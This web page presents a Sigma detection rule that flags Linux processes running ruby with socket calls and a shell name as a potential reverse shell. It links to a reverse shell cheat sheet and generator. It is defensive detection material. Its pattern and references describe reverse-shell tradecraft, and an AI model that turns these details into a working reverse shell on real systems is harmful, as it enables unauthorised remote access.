Potential Ruby Reverse Shell

Feb 1, 2024 · attack.execution ·

Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell

Sigma rule (View on GitHub)

 1title: Potential Ruby Reverse Shell
 2id: b8bdac18-c06e-4016-ac30-221553e74f59
 3status: test
 4description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
 5references:
 6    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 7    - https://www.revshells.com/
 8author: '@d4ns4n_'
 9date: 2023/04/07
10tags:
11    - attack.execution
12logsource:
13    category: process_creation
14    product: linux
15detection:
16    selection:
17        Image|contains: 'ruby'
18        CommandLine|contains|all:
19            - ' -e'
20            - 'rsocket'
21            - 'TCPSocket'
22        CommandLine|contains:
23            - ' ash'
24            - ' bash'
25            - ' bsh'
26            - ' csh'
27            - ' ksh'
28            - ' pdksh'
29            - ' sh'
30            - ' tcsh'
31    condition: selection
32falsepositives:
33    - Unknown
34level: medium

References

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new accou...

Read More
Online - Reverse Shell Generator

Online Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.

Read More

Potential Ruby Reverse Shell

Sigma rule (View on GitHub)

References

Reverse Shell Cheat Sheet

Online - Reverse Shell Generator

Related rules